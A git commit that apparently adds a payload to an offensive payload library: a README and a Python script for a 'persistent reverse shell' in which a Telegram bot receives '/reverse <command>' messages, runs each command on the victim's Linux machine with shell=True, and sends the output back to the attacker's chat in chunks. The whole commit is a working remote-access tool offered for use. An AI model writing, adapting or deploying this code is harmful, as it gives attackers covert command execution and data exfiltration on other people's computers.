payload

2023-08-03 10:35:53 +02:00 · 2023-08-03 10:35:53 +02:00 · 72ac8927b3
parent 8c3ca28399
commit 72ac8927b3
2 changed files with 84 additions and 0 deletions
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
@ -0,0 +1,41 @@
+# Persistent Reverse Shell - Telegram Based
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+**Category**: Execution
+
+## Dependencies
+
+* Internet Connection
+
+## Description
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
+
+The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
+
+Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
@ -0,0 +1,43 @@
+from telebot import TeleBot, types
+import subprocess
+
+# Set here the Telegram bot token
+BOT_TOKEN = ""
+bot = TeleBot(BOT_TOKEN)
+
+commands = [
+    types.BotCommand("/reverse", "/reverse <shell_command>")
+]
+
+bot.set_my_commands(commands=commands)
+
+@bot.message_handler(commands=['reverse'])
+def reverse_shell(message):
+    command = extract_command(message.text)
+    if command != "":
+        print(f"Command received: {command}")
+        out = run_command(command)
+        if len(out) > 1000:
+            bot.reply_to(message, "Message too long...")
+            chunk_size = 1000
+            for i in range(0, len(out), chunk_size):
+                bot.send_message(message.chat.id, out[i:i+chunk_size])
+        else:
+            bot.reply_to(message, out)
+
+def extract_command(message):
+    command_prefix = "/reverse"
+    if message.startswith(command_prefix):
+        return message[len(command_prefix):].strip()
+    else:
+        return None
+
+def run_command(command):
+    try:
+        result = subprocess.check_output(command, shell=True, text=True)
+        return result.strip()
+    except subprocess.CalledProcessError as e:
+        return f"Some error: {e}"
+
+
+bot.infinity_polling()